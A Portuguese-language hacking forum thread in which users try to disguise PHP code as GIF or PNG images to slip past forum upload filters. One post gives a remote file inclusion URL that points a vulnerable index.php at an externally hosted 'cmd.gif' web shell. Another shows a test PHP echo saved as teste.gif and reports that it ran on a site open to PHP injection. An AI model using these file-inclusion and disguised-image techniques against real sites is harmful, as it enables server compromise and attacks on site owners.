[AJUDA] Imagens Dinamicas

[CripToGraFado]

E aew Darkers,

Eu to precisando de uma ajuda de vocês... To querendo fazer uma imagem que executa um codigo php...

Tipo, tem aqueles CMD em formato de imagem (CMD.gif). É dessas que eu to querendo fazer....

Eu consegui fazer mais soh pega em HTML. PHP não.

Se alguem poder me ajudar...

Agradeço desde já !

Falow!

[Magrinho Loko]

Cara, eu to na mesma busca que você. A unica coisa que consegui foi isso:

http://www.awsystem.com.br/vtutoriais/f ... works.html

[Magrinho Loko]

Desculpe pelo Double Post, mas só veio isso à minha mente agora.

Essas CMD são arquivos texto salvos como arquivos .gif. Nada muito complexo. O unico problema é que se você for fazer um upload desta "imagem" para um fórum/site, ele será, em 99% dos casos, recusado. =/

Continuarei na busca, para ver se acho algo que é de interesse dos 2. =]

[CripToGraFado]

Desculpe pelo Double Post, mas só veio isso à minha mente agora.

Essas CMD são arquivos texto salvos como arquivos .gif. Nada muito complexo. O unico problema é que se você for fazer um upload desta "imagem" para um fórum/site, ele será, em 99% dos casos, recusado. =/

Continuarei na busca, para ver se acho algo que é de interesse dos 2. =]

Foi assim que eu consegui fazer uma.. Mais ela não funcionou em php :)

[Anonymous]

Seis tao tentando fazer uma CMD daquelas do bug file inclusion do php?Se for isso é simples...

[Magrinho Loko]

@Sonic: Eu não sei o caso dele, mas no meu caso, eu quero fazer um arquivo que passe no upload de fórums IPB como imagem  png só que com um code malicioso junto.

Já tentei algumas coisas, mas tudo em vão. =/


E essas CMD's o truque é apenas salvar o arquivo com extensão .gif. =]

[CripToGraFado]

@Sonic: Eu não sei o caso dele, mas no meu caso, eu quero fazer um arquivo que passe no upload de fórums IPB como imagem  png só que com um code malicioso junto.

Já tentei algumas coisas, mas tudo em vão. =/


E essas CMD's o truque é apenas salvar o arquivo com extensão .gif. =]

É a mesma coisa que eu quero!! =]

[branco]

bom amigos, quando utilizamos uma cmd em gif é diferente, porque estamos passando o conteudo da imagem como referencia à pagina do site, por exemplo

www.site.com.br/index.php?inc=www.nersh ... om/cmd.gif?

isso faria com que a imagem que está hospedada em www.nershess.orgfree.com/cmd.gif fosse passada como referencia à pagina index.php, ela vai ler o conteudo dessa imagem.

no caso dos foruns, creio que essa vulnerabilidade já foi concertada a cerca de um ano, a muito tempo atraz tentei passar essas imagems por email, fazendo com que quando o email fosse aberto executasse a foto que teria um script malicioso, porem foi em vão porque o hotmail não é vulneravel...creio que eles filtram o codigo de fonte da imagem, talvez não seja tão dificil fazer a imagem ficar em harmonia com o codigo malicioso para os servidores não repararem que existe algum codigo nela, porem tambem não deve ser tao facil porque se nao ja teriam feito isso...
desculpem não poder ajudar, nunca estudei mais a fundo esse assunto

até mais

[Magrinho Loko]

Parece que alguem ouviu nossas preces. =]

http://www.darkers.com.br/forum/http:// ... 025#p17025

Agora só temos de correr atras do dito-cujo.

[CripToGraFado]

Pow gente,

Consegui fazer oq eu queria. Somente peguei um arquivo e coloquei a extensão .gif =/

Eu foi no Bloco de Notas, e coloquei assim:

Code Select Expand

<?php
echo "funcionando";
?>

Salvei em teste.gif.

Depois eu tentei abrir no navedor mais não pego

Então tive a ideia de testar em um site vul. a  PHP Injection.. Ai incrivelmente funciono... =]

Aconteceu do mesmo jeito que o Insanity falou.

É isso ai gente, valew pela ajuda!

flw

[CripToGraFado]

Corrigindo: Quem falou isso foi o Branco

[Magrinho Loko]

@CripToGraFado:

Sim isso vai ocorrer, pq o site com php injection vai executar o arquivo que vc salvou no navegador. Esse é o mesmo principio das CMD's como arquivos .gif.

Oq eu quero é um arquivo .gif que passei nos uploads de alguns fóruns na web e que quando seja executado ative o code que está embutido na imagem.

Tente upar em algum forum IPB e veja oq ocorre, o arquivo é recusado.

[CripToGraFado]

@CripToGraFado:

Sim isso vai ocorrer, pq o site com php injection vai executar o arquivo que vc salvou no navegador. Esse é o mesmo principio das CMD's como arquivos .gif.

Oq eu quero é um arquivo .gif que passei nos uploads de alguns fóruns na web e que quando seja executado ative o code que está embutido na imagem.

Tente upar em algum forum IPB e veja oq ocorre, o arquivo é recusado.

Poisé... deu isso aqui tambem... É a mesma coisa q eu quero fazer, mais eu jah vi q nao da...

Eu tentei upar no imagenshack.us e nao deu! :|

flw

se achar a solução me avisa!